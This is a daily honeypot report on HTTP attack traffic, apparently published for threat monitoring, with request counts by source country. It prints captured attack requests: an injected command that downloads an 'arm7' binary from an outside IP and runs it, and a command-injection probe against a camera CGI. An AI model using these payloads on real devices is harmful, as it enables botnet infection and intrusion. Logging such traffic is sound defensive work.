Skip to main content
  1. Daily-Posts/

Report: 2025-05-31

·303 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-31
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 933 requests were recorded during the day, originating from 1 different countries, with a peak of 164 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.147POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1781GET /F1pu HTTP/1.1
1791GET /dZ6i HTTP/1.1
2211GET /ISAPI/Security/userCheck HTTP/1.1
2501GET /PictureCatch.cgi?username=GEOVISION\x5C&password=%3Bping%20-c%201%20220.158.233.210%3B\x5C&data_type=1\x5C&attachment=1\x5C&channel=1\x5C&secret=1\x5C&key=PWNED HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0164BG
1158US
2117CN
3109DE
485NL
542GB
636SG
724PL
821CH
920SC
1015FR
1114LT
1213SI
1311GH
148IL
158NG
167TH
176UA
186JP
196IR
206VN
215PT
225ID
235CA
245ZA
254BR
264IN
274AZ
283ES
293KR
303TR
313AO
322BE
332KZ
342IT
352IE
361HK
371IQ
381MC
391PA
401SE

Related

Report: 2025-05-30
·323 words
Repport Daily
Report: 2025-05-29
·6066 words
Repport Daily
Report: 2025-05-28
·295 words
Repport Daily